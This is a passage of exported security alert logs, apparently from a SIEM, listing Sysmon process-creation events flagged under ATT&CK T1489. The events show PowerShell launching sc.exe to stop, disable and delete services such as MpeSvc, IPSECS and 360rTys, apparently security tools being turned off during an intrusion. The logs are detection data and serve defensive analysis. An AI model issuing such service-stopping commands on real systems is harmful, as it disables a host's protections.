{df9fc3d3-b395-5ecf-0000-001019422100} +ProcessId: 876 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop MpeSvc +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.418366400Z"",""eventRecordID"":""2716"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.415\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-001019422100}\r\nProcessId: 876\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.415"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-001019422100}"",""processId"":""876"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop MpeSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.528",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.345 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010ec3e2100} +ProcessId: 7288 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) 
+Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop IPSECS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.351532400Z"",""eventRecordID"":""2713"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.345\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010ec3e2100}\r\nProcessId: 7288\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 
{df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.345"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010ec3e2100}"",""processId"":""7288"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop IPSECS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.479",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.261 +ProcessGuid: 
{df9fc3d3-b395-5ecf-0000-0010643b2100} +ProcessId: 3856 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop 360rTys +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.268513600Z"",""eventRecordID"":""2710"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.261\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010643b2100}\r\nProcessId: 3856\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.261"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010643b2100}"",""processId"":""3856"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop 360rTys"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 
29, 2020 @ 14:18:59.432",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.221 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010293a2100} +ProcessId: 4500 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config 360rTys Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config 360rTys Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.226531100Z"",""eventRecordID"":""2709"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.221\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010293a2100}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 
(WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config 360rTys Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.221"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010293a2100}"",""processId"":""4500"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config 360rTys Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.401",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.184 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-001025382100} +ProcessId: 6932 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfyxxx +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
Xtfyxxx",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.188449900Z"",""eventRecordID"":""2707"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.184\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-001025382100}\r\nProcessId: 6932\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.184"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-001025382100}"",""processId"":""6932"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® 
Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfyxxx"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.355",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.128 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-00107e352100} +ProcessId: 7776 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfya +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.131701200Z"",""eventRecordID"":""2704"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.128\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-00107e352100}\r\nProcessId: 7776\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:29.128"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-00107e352100}"",""processId"":""7776"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfya"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.310",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.089 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010c8332100} +ProcessId: 1988 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Xtfy +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
